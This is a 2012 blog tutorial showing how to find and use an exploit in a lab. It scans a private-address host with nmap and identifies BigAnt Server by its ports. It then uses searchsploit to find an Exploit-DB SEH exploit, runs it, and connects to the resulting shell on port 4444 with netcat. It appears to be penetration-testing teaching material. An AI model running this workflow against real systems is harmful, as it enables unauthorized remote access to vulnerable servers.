Comments

Pages

Monday 10 September 2012

Search Exploit from Exploit DB Repository

Posted by at 02:00 Read our previous post
In this case, I will using exploit from Exploit-DB Repository.
We need to search information about the target. I'm using Nmap to do that.

root@bt# nmap -p20-7000 172.16.227.130
-p options from nmap is used for scanning open port on target, the range is 20 until 7000. You can modify the range.
Results of this action is :


From the images above, you can see that we get two unknown port (6660 and 6661). To know about this ports, we need to search on google with keyword "application with port 6660 6661". The result is "BigAnt Server", next I will search exploit for BigAnt using exploit-db repository.

How to use ....
simply by running this command:
/pentest/exploits/exploitdb/searchsploit [keyword] [platform] [type[remote|local]]

root@bt# /pentest/exploits/exploitdb/searchsploit bigant windows remote

Many exploit for Big Ant, we need to try one-by-one. I will try using this exploit
BigAnt Server 2.52 SEH (0day) /windows/remote/10765.py

To use this exploit, we can read the script using text edior. For example kwrite.
kwrite /pentest/exploits/exploitdb/platforms/windows/remote/10765.py

Okay, you got it? I got it :D
#root@BT4VM:~# ./bigant.py 192.168.87.130
#Exploit sent! Connect to remote host on port 4444
#
#root@BT4VM:~# nc -vn 192.168.87.130 4444

Now, run the command:
root@bt# python /pentest/exploits/exploitdb/platforms/windows/remote/10765.py 172.16.227.130

Next, connect to the target using NetCat
root@bt# nc -v 172.16.227.130 4444

Done.

No comments:

Post a Comment

©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template